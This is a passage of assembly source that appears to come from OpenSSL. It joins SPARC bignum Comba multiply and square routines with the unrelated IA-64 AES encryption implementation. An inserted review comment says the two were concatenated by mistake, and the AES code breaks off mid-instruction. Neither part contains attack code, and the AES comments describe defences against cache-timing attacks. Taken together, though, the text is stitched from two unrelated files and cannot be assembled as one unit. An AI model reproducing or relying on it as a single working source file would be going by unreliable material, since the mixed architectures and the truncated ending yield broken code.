add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(3) !=!r[3]=c1;
or c_12,c_3,c_12
mulx a_3,b_1,t_1 !mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,b_2,t_1 !mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,b_3,t_1 !mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_12,t_1,t_1 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !=!r[4]=c2;
or c_12,c_3,c_12
mulx a_2,b_3,t_1 !mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_12,t_1,t_1 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(5) !=!r[5]=c3;
or c_12,c_3,c_12
mulx a_3,b_3,t_1 !mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_12,t_1,t_1
srlx t_1,32,c_12 !=
stuw t_1,rp(6) !r[6]=c1;
stuw c_12,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_mul_comba4,#function
.size bn_mul_comba4,(.-bn_mul_comba4)
.align 32
.global bn_sqr_comba8
bn_sqr_comba8:
save %sp,FRAME_SIZE,%sp
mov 1,t_2
lduw ap(0),a_0
sllx t_2,32,t_2
lduw ap(1),a_1
mulx a_0,a_0,t_1 !sqr_add_c(a,0,c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !r[0]=c1;
lduw ap(2),a_2
mulx a_0,a_1,t_1 !=!sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12
mulx a_0,a_3,t_1 !sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(4),a_4
mulx a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
st t_1,rp(3) !r[3]=c1;
or c_12,c_3,c_12
mulx a_4,a_0,t_1 !sqr_add_c2(a,4,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(5),a_5
mulx a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !r[4]=c2;
or c_12,c_3,c_12
mulx a_0,a_5,t_1 !sqr_add_c2(a,5,0,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,a_4,t_1 !sqr_add_c2(a,4,1,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(6),a_6
mulx a_2,a_3,t_1 !sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(5) !r[5]=c3;
or c_12,c_3,c_12
mulx a_6,a_0,t_1 !sqr_add_c2(a,6,0,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_1,t_1 !sqr_add_c2(a,5,1,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,a_2,t_1 !sqr_add_c2(a,4,2,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(7),a_7
mulx a_3,a_3,t_1 !=!sqr_add_c(a,3,c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(6) !r[6]=c1;
or c_12,c_3,c_12
mulx a_0,a_7,t_1 !sqr_add_c2(a,7,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,a_6,t_1 !sqr_add_c2(a,6,1,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,a_5,t_1 !sqr_add_c2(a,5,2,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,a_4,t_1 !sqr_add_c2(a,4,3,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(7) !r[7]=c2;
or c_12,c_3,c_12
mulx a_7,a_1,t_1 !sqr_add_c2(a,7,1,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_6,a_2,t_1 !sqr_add_c2(a,6,2,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_3,t_1 !sqr_add_c2(a,5,3,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,a_4,t_1 !sqr_add_c(a,4,c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(8) !r[8]=c3;
or c_12,c_3,c_12
mulx a_2,a_7,t_1 !sqr_add_c2(a,7,2,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,a_6,t_1 !sqr_add_c2(a,6,3,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,a_5,t_1 !sqr_add_c2(a,5,4,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(9) !r[9]=c1;
or c_12,c_3,c_12
mulx a_7,a_3,t_1 !sqr_add_c2(a,7,3,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_6,a_4,t_1 !sqr_add_c2(a,6,4,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_5,t_1 !sqr_add_c(a,5,c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(10) !r[10]=c2;
or c_12,c_3,c_12
mulx a_4,a_7,t_1 !sqr_add_c2(a,7,4,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_6,t_1 !sqr_add_c2(a,6,5,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(11) !r[11]=c3;
or c_12,c_3,c_12
mulx a_7,a_5,t_1 !sqr_add_c2(a,7,5,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_6,a_6,t_1 !sqr_add_c(a,6,c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(12) !r[12]=c1;
or c_12,c_3,c_12
mulx a_6,a_7,t_1 !sqr_add_c2(a,7,6,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(13) !r[13]=c2;
or c_12,c_3,c_12
mulx a_7,a_7,t_1 !sqr_add_c(a,7,c3,c1,c2);
addcc c_12,t_1,t_1
srlx t_1,32,c_12
stuw t_1,rp(14) !r[14]=c3;
stuw c_12,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba8,#function
.size bn_sqr_comba8,(.-bn_sqr_comba8)
.align 32
.global bn_sqr_comba4
/*
* void bn_sqr_comba4(r,a)
* BN_ULONG *r,*a;
*/
bn_sqr_comba4:
save %sp,FRAME_SIZE,%sp
mov 1,t_2
lduw ap(0),a_0
sllx t_2,32,t_2
lduw ap(1),a_1
mulx a_0,a_0,t_1 !sqr_add_c(a,0,c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !r[0]=c1;
lduw ap(2),a_2
mulx a_0,a_1,t_1 !sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12
mulx a_0,a_3,t_1 !sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(3) !r[3]=c1;
or c_12,c_3,c_12
mulx a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !r[4]=c2;
or c_12,c_3,c_12
mulx a_2,a_3,t_1 !sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(5) !r[5]=c3;
or c_12,c_3,c_12
mulx a_3,a_3,t_1 !sqr_add_c(a,3,c1,c2,c3);
addcc c_12,t_1,t_1
srlx t_1,32,c_12
stuw t_1,rp(6) !r[6]=c1;
stuw c_12,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba4,#function
.size bn_sqr_comba4,(.-bn_sqr_comba4)
.align 32
// ==== NOTE(review): stray dataset-concatenation residue removed here.
// The section below is crypto/aes/asm/aes-ia64.S (OpenSSL), unrelated
// to the SPARC bn_* routines above; this file is not assemblable as a
// single unit. ====
|
// ====================================================================
// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
// project. Rights for redistribution and usage in source and binary
// forms are granted according to the OpenSSL license.
// ====================================================================
//
// What's wrong with compiler generated code? Compiler never uses
// variable 'shr' which is pairable with 'extr'/'dep' instructions.
// Then it uses 'zxt' which is an I-type, but can be replaced with
// 'and' which in turn can be assigned to M-port [there're double as
// much M-ports as there're I-ports on Itanium 2]. By sacrificing few
// registers for small constants (255, 24 and 16) to be used with
// 'shr' and 'and' instructions I can achieve better ILP, Instruction
// Level Parallelism, and performance. This code outperforms GCC 3.3
// generated code by over factor of 2 (two), GCC 3.4 - by 70% and
// HP C - by 40%. Measured best-case scenario, i.e. aligned
// big-endian input, ECB timing on Itanium 2 is (18 + 13*rounds)
// ticks per block, or 9.25 CPU cycles per byte for 128 bit key.
// Version 1.2 mitigates the hazard of cache-timing attacks by
// a) compressing S-boxes from 8KB to 2KB+256B, b) scheduling
// references to S-boxes for L2 cache latency, c) prefetching T[ed]4
// prior last round. As result performance dropped to (26 + 15*rounds)
// ticks per block or 11 cycles per byte processed with 128-bit key.
// This is ~16% deterioration. For reference Itanium 2 L1 cache has
// 64 bytes line size and L2 - 128 bytes...
.ident "aes-ia64.S, version 1.2"
.ident "IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
.explicit
.text
rk0=r8; rk1=r9;
pfssave=r2;
lcsave=r10;
prsave=r3;
maskff=r11;
twenty4=r14;
sixteen=r15;
te00=r16; te11=r17; te22=r18; te33=r19;
te01=r20; te12=r21; te23=r22; te30=r23;
te02=r24; te13=r25; te20=r26; te31=r27;
te03=r28; te10=r29; te21=r30; te32=r31;
// these are rotating...
t0=r32; s0=r33;
t1=r34; s1=r35;
t2=r36; s2=r37;
t3=r38; s3=r39;
te0=r40; te1=r41; te2=r42; te3=r43;
#if defined(_HPUX_SOURCE) && !defined(_LP64)
# define ADDP addp4
#else
# define ADDP add
#endif
// Offsets from Te0
#define TE0 0
#define TE2 2
#if defined(_HPUX_SOURCE) || defined(B_ENDIAN)
#define TE1 3
#define TE3 1
#else
#define TE1 1
#define TE3 3
#endif
// This implies that AES_KEY comprises 32-bit key schedule elements
// even on LP64 platforms.
#ifndef KSZ
# define KSZ 4
# define LDKEY ld4
#endif
.proc _ia64_AES_encrypt#
// Input: rk0-rk1
// te0
// te3 as AES_KEY->rounds!!!
// s0-s3
// maskff,twenty4,sixteen
// Output: r16,r20,r24,r28 as s0-s3
// Clobber: r16-r31,rk0-rk1,r32-r43
.align 32
_ia64_AES_encrypt:
.prologue
.altrp b6
.body
{ .mmi; alloc r16=ar.pfs,12,0,0,8
LDKEY t0=[rk0],2*KSZ
mov pr.rot=1<<16 }
{ .mmi; LDKEY t1=[rk1],2*KSZ
add te1=TE1,te0
add te3=-3,te3 };;
{ .mib; LDKEY t2=[rk0],2*KSZ
mov ar.ec=2 }
{ .mib; LDKEY t3=[rk1],2*KSZ
add te2=TE2,te0
brp.loop.imp .Le_top,.Le_end-16 };;
{ .mmi; xor s0=s0,t0
xor s1=s1,t1
mov ar.lc=te3 }
{ .mmi; xor s2=s2,t2
xor s3=s3,t3
add te3=TE3,te0 };;
.align 32
.Le_top:
{ .mmi; (p0) LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
(p0) and te33=s3,maskff // 0/0:s3&0xff
(p0) extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; (p0) LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
(p0) and te30=s0,maskff // 0/1:s0&0xff
(p0) shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; (p0) LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
(p0) shladd te33=te33,3,te3 // 1/0:te0+s0>>24
(p0) extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; (p0) LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
(p0) shladd te30=te30,3,te3 // 1/1:te3+s0
(p0) shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; (p0) ld4 te33=[te33] // 2/0:te3[s3&0xff]
(p0) shladd te22=te22,3,te2 // 2/0:te2+s2>>8&0xff
(p0) extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; (p0) ld4 te30=[te30] // 2/1:te3[s0]
(p0) shladd te23=te23,3,te2 // 2/1:te2+s3>>8
(p0) shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; (p0) ld4 te22=[te22] // 3/0:te2[s2>>8]
(p0) shladd te20=te20,3,te2 // 3/2:te2+s0>>8
(p0) extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; (p0) ld4 te23=[te23] // 3/1:te2[s3>>8]
(p0) shladd te00=te00,3,te0 // 3/0:te0+s0>>24
(p0) shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; (p0) ld4 te20=[te20] // 4/2:te2[s0>>8]
(p0) shladd te21=te21,3,te2 // 4/3:te3+s2
(p0) extr.u te11=s1,16,8 } // 4/0:s1>>16&0xff
{ .mmi; (p0) ld4 te00=[te00] // 4/0:te0[s0>>24]
(p0) shladd te01=te01,3,te0 // 4/1:te0+s1>>24
(p0) shr.u te13=s3,sixteen };; // 4/2:s3>>16
{ .mmi; (p0) ld4 te21=[te21] // 5/3:te2[s1>>8]
(p0) shladd te11=te11,3,te1 // 5/0:te1+s1>>16
(p0) extr.u te12=s2,16,8 } // 5/1:s2>>16&0xff
{ .mmi; (p0) ld4 te01=[te01] // 5/1:te0[s1>>24]
(p0) shladd te02=te02,3,te0 // 5/2:te0+s2>>24
(p0) and te31=s1,maskff };; // 5/2:s1&0xff
{ .mmi; (p0) ld4 te11=[te11] // 6/0:te1[s1>>16]
(p0) shladd te12=te12,3,te1 // 6/1:te1+s2>>16
(p0) extr.u te10=s0,16,8 } // 6/3:s0>>16&0xff
{ .mmi; (p0) ld4 te02=[te02] // 6/2:te0[s2>>24]
(p0) shladd te03=te03,3,te0 // 6/3:te1+s0>>16
(p0) and te32=s2,maskff };; // 6/3:s2&0xff
{ .mmi; (p0) ld4 te12=[te12] // 7/1:te1[s2>>16]
(p0) shladd te31=te31,3,te3 // 7/2:te3+s1&0xff
(p0) and te13=te13,maskff} // 7/2:s3>>16&0xff
{ .mmi; (p0) ld4 te03=[te03] // 7/3:te0[s3>>24]
(p0) shladd te32=te32,3,te3 // 7/3:te3+s2
(p0) xor t0=t0,te33 };; // 7/0:
{ .mmi; (p0) ld4 te31=[te31] // 8/2:te3[s1]
(p0) shladd te13=te13,3,te1 // 8/2:te1+s3>>16
(p0) xor t0=t0,te22 } // 8/0:
{ .mmi; (p0) ld4 te32=[te32] // 8/3:te3[s2]
(p0) shladd te10=te10,3,te1 // 8/3:te1+s0>>16
(p0) xor t1=t1,te30 };; // 8/1:
{ .mmi; (p0) ld4 te13=[te13] // 9/2:te1[s3>>16]
(p0) ld4 te10=[te10] // 9/3:te1[s0>>16]
(p0) xor t0=t0,te00 };; // 9/0: !L2 scheduling
{ .mmi; (p0) xor t1=t1,te23 // 10[9]/1:
(p0) xor t2=t2,te20 // 10[9]/2:
(p0) xor t3=t3,te21 };; // 10[9]/3:
{ .mmi; (p0) xor t0=t0,te11 // 11[10]/0:done!
(p0) xor t1=t1,te01 // 11[10]/1:
(p0) xor t2=t2,te02 };; // 11[10]/2: !L2 scheduling
{ .mmi; (p0) xor t3=t3,te03 // 12[10]/3:
(p16) cmp.eq p0,p17=r0,r0 };; // 12[10]/clear (p17)
{ .mmi; (p0) xor t1=t1,te12 // 13[11]/1:done!
(p0) xor t2=t2,te31 // 13[11]/2:
(p0) xor t3=t3,te32 } // 13[11]/3:
{ .mmi; (p17) add te0=2048,te0 // 13[11]/
(p17) add te1=2048+64-TE1,te1};; // 13[11]/
{ .mib; (p0) xor t2=t2,te13 // 14[12]/2:done!
(p17) add te2=2048+128-TE2,te2} // 14[12]/
{ .mib; (p0) xor t3=t3,te10 // 14[12]/3:done!
(p17) add te3=2048+192-TE3,te3 // 14[12]/
br.ctop.sptk .Le_top };;
.Le_end:
{ .mmi; ld8 te12=[te0] // prefetch Te4
ld8 te31=[te1] }
{ .mmi; ld8 te10=[te2]
ld8 te32=[te3] }
{ .mmi; LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
and te33=s3,maskff // 0/0:s3&0xff
extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
and te30=s0,maskff // 0/1:s0&0xff
shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
add te33=te33,te0 // 1/0:te0+s0>>24
extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
add te30=te30,te0 // 1/1:te0+s0
shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; ld1 te33=[te33] // 2/0:te0[s3&0xff]
add te22=te22,te0 // 2/0:te0+s2>>8&0xff
extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; ld1 te30=[te30] // 2/1:te0[s0]
add te23=te23,te0 // 2/1:te0+s3>>8
shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; ld1 te22=[te22] // 3/0:te0[s2>>8]
add te20=te20,te0 // 3/2:te0+s0>>8
extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; ld1 te23=[te23] // 3/1:te0[s3>>8]
add te00=te00,te0 // 3/0:te0+s0>>24
shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; ld1 te20=[te20] // 4/2:te0[s0>>8]
add te21=te21,te0 // 4/3:te0+s2
extr.u te11=s1,16,8 } // 4/0:s1>>16&0xff
{ .mmi; ld1 te00=[te00] // 4/0:te0[s0>>24]
add te01=te01,te0 // 4/1:te0+s1>>24
shr.u te13=s3,sixteen };; // 4/2:s3>>16
{ .mmi; ld1 te21=[te21] // 5/3:te0[s1>>8]
add te11=te11,te0 // 5/0:te0+s1>>16
extr.u te12=s2,16,8 } // 5/1:s2>>16&0xff
{ .mmi; ld1 te01=[te01] // 5/1:te0[s1>>24]
add te02=te02,te0 // 5/2:te0+s2>>24
and te31=s1,maskff };; // 5/2:s1&0xff
{ .mmi; ld1 te11=[te11] // 6/0:te0[s1>>16]
add te12=te12,te0 // 6/1:te0+s2>>16
extr.u te10=s0,16,8 } // 6/3:s0>>16&0xff
{ .mmi; ld1 te02=[te02] // 6/2:te0[s2>>24]
add te03=te03,te0 // 6/3:te0+s0>>16
and te32=s2,maskff };; // 6/3:s2&0xff
{ .mmi; ld1 te12=[te12] // 7/1:te0[s2>>16]
add te31=te31,te0 // 7/2:te0+s1&0xff
dep te33=te22,te33,8,8} // 7/0:
{ .mmi; ld1 te03=[te03] // 7/3:te0[s3>>24]
add te32=te32,te0 // 7/3:te0+s2
and te13=te13,maskff};; // 7/2:s3>>16&0xff
{ .mmi; ld1 te31=[te31] // 8/2:te0[s1]
add te13=te13,te0 // 8/2:te0+s3>>16
dep te30=te23,te30,8,8} // 8/1:
{ .mmi; ld1 te32=[te32] // 8/3:te0[s2]
add te10=te10,te0 // 8/3:te0+s0>>16
shl te00=te00,twenty4};; // 8/0:
{ .mii; ld1 te13=[te13] // 9/2:te0[s3>>16]
dep te33=te11,te33,16,8 // 9/0:
shl te01=te01,twenty4};; // 9/1:
{ .mii; ld1 te10=[te10] // 10/3:te0[s0>>16]
dep te31=te20,te31,8,8 // 10/2:
shl te02=te02,twenty4};; // 10/2:
{ .mii; xor t0=t0,te33 // 11/0:
dep te32=te21,te32,8,8 // 11/3:
shl te12=te12,sixteen};; // 11/1:
{ .mii; xor r16=t0,te00 // 12/0:done!
dep te31=te13,te31,16,8 // 12/2:
shl te03=te03,twenty4};; // 12/3:
{ .mmi; xor t1=t1,te01 // 13/1:
xor t2=t2,te02 // 13/2:
dep te32=te10,te32,16,8};; // 13/3:
{ .mmi; xor t1=t1,te30 // 14/1:
xor r24=t2,te31 // 14/2:done!
xor t3=t3,te32 };; // 14/3:
{ .mib; xor r20=t1,te12 // 15/1:done!
xor r28=t3,te03 // 15/3:done!
br.ret.sptk b6 };;
.endp _ia64_AES_encrypt#
// void AES_encrypt (const void *in,void *out,const AES_KEY *key);
.global AES_encrypt#
.proc AES_encrypt#
.align 32
AES_encrypt:
.prologue
.save ar.pfs,pfssave
{ .mmi; alloc pfssave=ar.pfs,3,1,12,0
and out0=3,in0
mov r3=ip }
{ .mmi; ADDP in0=0,in0
mov loc0=psr.um
ADDP out11=KSZ*60,in2 };; // &AES_KEY->rounds
{ .mmi; ld4 out11=[out11] // AES_KEY->rounds
add out8=(AES_Te#-AES_encrypt#),r3 // Te0
.save pr,prsave
mov prsave=pr }
{ .mmi; rum 1<<3 // clear um.ac
.save ar.lc,lcsave
mov lcsave=ar.lc };;
.body
#if defined(_HPUX_SOURCE) // HPUX is big-endian, cut 15+15 cycles...
{ .mib; cmp.ne p6,p0=out0,r0
add out0=4,in0
(p6) br.dpnt.many .Le_i_unaligned };;
{ .mmi; ld4 out1=[in0],8 // s0
and out9=3,in1
mov twenty4=24 }
{ .mmi; ld4 out3=[out0],8 // s1
ADDP rk0=0,in2
mov sixteen=16 };;
{ .mmi; ld4 out5=[in0] // s2
cmp.ne p6,p0=out9,r0
mov maskff=0xff }
{ .mmb; ld4 out7=[out0] // s3
ADDP rk1=KSZ,in2
br.call.sptk.many b6=_ia64_AES_encrypt };;
{ .mib; ADDP in0=4,in1
ADDP in1=0,in1
(p6) br.spnt .Le_o_unaligned };;
{ .mii; mov psr.um=loc0
mov ar.pfs=pfssave
mov ar.lc=lcsave };;
{ .mmi; st4 [in1]=r16,8 // s0
st4 [in0]=r20,8 // s1
mov pr=prsave,0x1ffff };;
{ .mmb; st4 [in1]=r24 // s2
st4 [in0]=r28 // s3
br.ret.sptk.many b0 };;
#endif
.align 32
.Le_i_unaligned:
{ .mmi; add out0=1,in0
add out2=2,in0
add out4=3,in0 };;
{ .mmi; ld1 r16=[in0],4
ld1 r17=[out0],4 }//;;
{ .mmi; ld1 r18=[out2],4
ld1 out1=[out4],4 };; // s0
{ .mmi; ld1 r20=[in0],4
ld1 r21=[out0],4 }//;;
{ .mmi; ld1 r22=[out2],4
ld1 out3=[out4],4 };; // s1
{ .mmi; ld1 r24=[in0],4
ld1 r25=[out0],4 }//;;
{ .mmi; ld1 r26=[out2],4
ld1 out5=[out4],4 };; // s2
{ .mmi; ld1 r28=[in0]
ld1 r29=[out0] }//;;
{ .mmi; ld1 r30=[out2]
